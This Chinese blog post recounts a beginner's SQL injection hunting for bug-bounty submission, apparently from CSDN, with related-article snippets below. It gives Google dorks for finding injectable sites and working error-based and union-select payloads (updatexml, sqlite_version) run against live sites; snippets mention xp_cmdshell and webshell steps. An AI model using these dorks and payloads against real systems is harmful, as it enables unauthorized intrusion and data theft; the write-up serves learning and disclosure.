sql注入实战经历

最新推荐文章于 2024-08-28 08:30:00 发布
最新推荐文章于 2024-08-28 08:30:00 发布
阅读量393 收藏 3
点赞数 8
分类专栏: src记录 文章标签: sql 数据库 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50488257/article/details/139464486
版权

学完基本漏洞基本原理,想尝试挖一下src,记录一下过程。

新手轻喷

一、使用谷歌语法搜索可能存在sql注入的站点

寻找SQL注入

公司inurl:php?id=

公司inurl:asp?id=

公司inurl:aspx?id=

二、使用测试是否存在sql注入

使用 and 1=1 和 and 1=2 测试是否存在sql注入,发现页面返回都正常,怀疑是不是使用了单引号或双引号,尝试单引号发现页面报错了

三、尝试报错注入

使用下面语句构成报错注入的sql语句,发现页面显示出了数据库的版本信息

id=264 and updatexml(1,concat(0x7e,(@@version),0x7e),1)

四、找到一个sqlite数据的站点

使用and 1=2 和and 1=1 去测试是否存在sql注入,发现and 1=2 时,页面没回现。

使用order by 去查看数据库字段数,发现数据库有5个字段

使用 union select 1,2,3,4,5  发现除了3都有回现。

一开始使用union seelct 1,@@version,3,4,5  发现怎么都没回现,使用 union seelct 1,database(),3,4,5 发现页面什么都不返回。才想起来是sqlite数据库,语法可能不一样,

百度搜索发现sqlite数据库查询版本信息是使用sqlite_version(*),

重新构造sql语句,发现了数据库的版本信息显示出来了

128 union select 1,sqlite_version(*),3,4,5

两个漏洞都提交给补天平台,平台表示,系统的权重太低,不收

第二个系统漏洞已经整改了。

记一次系统被sql注入搞挂的惨痛经历
lisu061714112的专栏
04-22 2907
前言 最近我在整理安全漏洞相关问题,准备在公司做一次分享。恰好,这段时间团队发现了一个sql注入漏洞:在一个公共的分页功能中,排序字段作为入参,前端页面可以自定义。在分页sql的mybatis mapper.xml中,order by字段后面使用$符号动态接收计算后的排序参数,这样可以实现动态排序的功能。 但是,如果入参传入: id; select 1 -- 最终执行的sql会变成: select * from user order by id; select 1 -- limit 1,20 –会把后面
SQLite学习(十)SQLite注入问题的防范、数据库文件导入和导出
Designer 小郑的技术博客
05-12 3304
本文讲解了SQLite中的SQL注入问题,以及SQLite中数据备份、数据还原、导出SQL文件的方法,用最简单的方法做最通俗的教学!
SQL注入过程(一)
m0_43438893的博客
06-16 406
文章出处:https://blog.csdn.net/csh624366188/article/details/8109502 (引用至此链接,本文仅作本人学习用,望原作者见谅) SQL注入攻击的总体思路是: 1.发现SQL注入位置; 2.判断后台数据库类型; 3.确定XP_CMDSHELL可执行情况 4.发现WEB虚拟目录 5. 上传ASP木马; 6.得到管理员权限; 一、SQL注入漏洞的判...
记一次我的漏洞挖掘实战——某公司的SQL注入漏洞
PICACHU+++的博客
05-02 5499
我是在漏洞盒子上提交的漏洞,上面有一个项目叫做公益SRC。公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞在漏洞盒子进行提交。在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。SQL注入的防御方法很多,也是老生常谈的问题。
使用google挖掘SQL注入漏洞
qq_58091216的博客
10-04 3995
使用google挖掘SQL注入漏洞
测试具有44个漏洞点的简单小靶场-SQL注入
虚闻界的博客
08-11 1335
关于常见SQL注入的经验及小技巧,以及自己的一些学习经历
SQL注入实战演练】:安全测试专家!如何安全地测试和修补系统漏洞
[【SQL注入实战演练】:安全测试专家!如何安全地测试和修补系统漏洞](https://opengraph.githubassets.com/71169b4e2c135d77b7e7bb31b3923939679376afb4c9277cd566bf1842368d15/sqlmapproject/sqlmap) # 摘要 SQL...
金融公司遭遇SQL注入与Webshell攻击:防范与应对实战
本文讲述了作者在一次金融公司的技术沙龙中,亲身经历了一次与SQL注入和Webshell的意外遭遇。在一场技术分享会中,公司的PHP开发人员发现数据库遭受了SQL注入攻击,导致多个表的字段被注入,威胁到了系统的安全和...
SQL注入过时?揭秘现代渗透测试实战与防范策略
作者罗伟以亲身经历和案例分析的方式,强调了SQL注入虽然曾经是Web应用系统的常见漏洞,但随着技术的发展,它并未过时,而是成为了衡量渗透测试人员综合能力的一个重要环节。 SQL注入,全称为Structured Query ...
WEB安全原理(1)——SQL注入
yuluotianjin的博客
09-01 648
1.Union注入 如果通过sql注入,页面上能获取预期信息,则可使用Union注入。 (1)判断是否存在注入点(区分下是数字型注入还是字符型注入) id=1 # 正常回值 id=1' # 异常回值 id=1 and 1=1 # 正常回值 id=1 and 1=2 # 异常回值 (2)判断表中的字段数 id=1 order by [1,2,3,……] 使用order by语句,后面跟随具体数字,这些数字可用于指代表中字段名,观察数字从1开始递增到哪个数字为止,界面回值均会正常,则那个终止的数字则为字段
SQLite 注入
12-16
SQLite 注入 如果您的站点允许用户通过网页输入,并将输入内容插入到 SQLite 数据库中,这个时候您就面临着一个被称为 SQL 注入的安全问题。本章节将向您讲解如何防止这种情况的发生,确保脚本和 SQLite 语句的安全。 注入通常在请求用户输入时发生,比如需要用户输入姓名,但用户却输入了一个 SQLite 语句,而这语句就会在不知不觉中在数据库上运行。 永远不要相信用户提供的数据,所以只处理通过验证的数据,这项规则是通过模式匹配来完成的。在下面的实例中,用户名 username 被限制为字母数字字符或者下划线,长度必须在 8 到 20 个字符之间 – 请根据需要修改这些规则。 if
利用谷歌搜索SQL注入漏洞关键词
12-16
利用谷歌搜索SQL注入漏洞关键词 目标关键字+inurl:id 英语字母及单词+inurl:id 网站域名+inurl:id 阿拉伯数字+inurl:id inurl:asp?id= inurl:Article_Print.asp? EnCompHonorBig.asp?id=随便加个数字 showproduct.asp?id=随便加个数字 inurl:ManageLogin.asp EnCompHonorBig.asp?id= 随便加个数字 inurl: (asp?=数字) inurl: (php?=数字 等等 里面都有很多。 非常简单好用
SQLite 数据库注入总结
HBohan的博客
10-09 6953
前言 SQLite 是一个进程内的库,实现了自给自足的、无服务器的、零配置的、事务性的 SQL 数据库引擎。它是一个零配置的数据库,这意味着与其他数据库不一样,您不需要在系统中配置。SQLite 与 MySQL 还是有些区别的,SQLite 直接读写普通磁盘文件,每一个数据库就是一个文件,可以按应用程序需求进行静态或动态连接其存储文件进行数据操作。 SQLite 基础 在本篇文章中我们使用 SQLite3 来学习,SQLite3 的语法与 MySQL 相似。详细语法可以在这里学习:https://www.r
Google搜索SQL注入漏洞的搜索语法
最新发布
weixin_68416970的博客
08-28 2211
语法描述示例结果说明搜索 URL 中包含指定参数查找 URL 中包含id=的页面搜索包含 SQL 错误提示的页面返回包含 SQL 错误提示的页面搜索页面正文中的数据库错误提示信息返回页面中包含 MySQL 错误提示信息的页面搜索特定文件类型返回包含 SQL 错误的日志文件搜索特定 CMS 中的 SQL 注入漏洞返回可能存在漏洞的 Joomla 站点id="查找 URL 中常见的 SQL 注入点id="返回 URL 中包含.php?id=的页面。
最详细SQL注入教程
热门推荐
zyw_anquan的专栏
08-31 3万+
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。  SQL注入是从正常的WW
4 个单词,谷歌返回 16 个 SQL 注入漏洞
2401_83704159的博客
03-28 618
只在绝对必要的情况下才对传入的参数进行转义作者尝试进行了部分转义,但存在漏洞没有任何转义逻辑这名开发者表示,当他发现一个搜索结果中存在有问题的 SQL 语句时,就会跳到浏览下一个结果。上面就是根据此过程整理出来的 30 条搜索结果,其中部分答案包含 SQL 注入语句。对此他认为,大多数 Google 搜索结果的质量十分低下。有些搜索结果就是通过 SEO 优化而排在前面的“扯淡”教程。同时,这篇文章也引起了程序员的广泛讨论(reddit, Hacker News),不过大家关注的重点也纷纷转移到了编程语言 P
SQLite注入记录(目前最全、核心函数用法、布尔盲注、时间盲注、webshell、动态库,绕过方式)
墨痕诉清风的博客
02-28 2840
为了方便开发者可以很轻便的扩展功能,SQLite 从 3.3.6 版本开始提供了支持扩展的能力,通过sqlite_load_extension API(或者 load_extension 函数 ),开发者可以在不改动 SQLite 源码的情况下,通过动态加载的库(so/dll/dylib)来扩展 SQLite 的能力。SQLite 的 ATTACH DATABASE 语句是用来选择一个特定的数据库,使用该命令后,所有的 SQLite 语句将在附加的数据库下执行。执行 payload 后将有一段时间的延时。
谷歌/FOFA搜索引擎使用
Trave-ler
01-21 4240
谷歌搜索引擎的使用 1.谷歌语法 利用搜索引擎在渗透测试过程搜索到特定页面的一种语法 “xxx” :将要搜索的关键字用引号括起来(表示完全匹配,即关键词不能分开,顺序也不能变) +:“xxx” +baidu.com 搜索xxx与baidu.com相关的内容 -: “xxx”-baidu.com 搜索结果里面除去baidu.com相关的内容 2.谷歌语法基础使用 site:指定域名,如:site:edu.cn inurl:用于搜索包含的url关键词的网页,如:inurl:login 搜索
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值